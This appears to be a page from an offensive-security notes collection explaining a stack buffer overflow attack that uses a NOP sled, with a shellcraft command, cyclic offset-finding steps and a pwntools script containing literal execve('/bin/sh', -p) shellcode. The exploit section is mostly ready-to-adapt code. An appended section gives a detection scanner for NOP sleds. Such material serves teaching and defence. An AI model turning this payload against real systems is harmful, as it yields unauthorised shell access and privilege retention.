killchain-compendium/exploit/buffer_overflow/docs/cut_stack_in_half.md


Cut Stack in Half + NOPsled

  • The stack has to be executable (no NX).
  • Payload layout: cyclic padding up to the saved eip, then an eip value of esp plus roughly half the stack (so it lands inside the sled), then the NOP sled, then the shellcode.
  • ASLR has to be off, or the eip value pointing into the sled has to be brute-forced extensively.

shellcraft

  • For example, an i386 Linux execve("/bin///sh", ["sh", "-p"]) shellcode emitted as an escaped string (-f s):
    shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s

Usage

  • Measure the eip offset: generate a cyclic pattern via
    cyclic <number>
    
    • Check the eip content in gdb, then look up its offset via
    cyclic -l <eipContent>
    
  • Example code (Python 3 / pwntools; <eipContent> and <esp> are the values read in gdb)
from pwn import *

padding = cyclic(cyclic_find(<eipContent>))   # bytes up to the saved eip
eip = p32(<esp> + some offset into stack)      # return into the middle of the sled
sled = b"\x90" * 100                           # NOP sled, 100 bytes of 0x90
shellcode = b"jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"  # shellcraft output
payload = padding + eip + sled + shellcode
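As an added detection-side example (not part of the compendium's notes): the NOP sled this technique depends on is a long run of 0x90 bytes, which is exactly what the classic IDS "x86 NOOP" heuristic looks for. The scanner below flags such runs in an untrusted buffer; the sample payload, threshold and function names are constructed here.

```python
# Added example, not the compendium's own code: detect long runs of
# single-byte NOPs (a NOP sled) in an untrusted input buffer.

NOP_BYTES = {0x90}  # plain `nop`; extend with other one-byte no-op opcodes as needed


def find_nop_sleds(data: bytes, min_len: int = 32, nop_bytes=NOP_BYTES):
    """Return (offset, length) for every run of NOP-class bytes that is at
    least `min_len` long; shorter runs are ignored as noise."""
    sleds = []
    i, n = 0, len(data)
    while i < n:
        if data[i] in nop_bytes:
            start = i
            while i < n and data[i] in nop_bytes:
                i += 1
            if i - start >= min_len:
                sleds.append((start, i - start))
        else:
            i += 1
    return sleds


def looks_like_sled_payload(data: bytes, min_len: int = 32) -> bool:
    """True if the buffer contains at least one sled of `min_len` NOPs."""
    return bool(find_nop_sleds(data, min_len))


if __name__ == "__main__":
    # Constructed sample mirroring the layout above: padding, a fake return
    # address, a 100-byte sled and a placeholder tail (not real shellcode).
    sample = b"A" * 44 + b"\xef\xbe\xad\xde" + b"\x90" * 100 + b"\xcc" * 8
    benign = b"GET /index.html HTTP/1.1\r\nHost: example\r\n\r\n"
    print(find_nop_sleds(sample))           # [(48, 100)]
    print(looks_like_sled_payload(benign))  # False
```

The heuristic is only one signal, since sleds can be built from other NOP-equivalent instructions; the preconditions listed at the top of the page (executable stack, ASLR off) are what NX and ASLR remove outright.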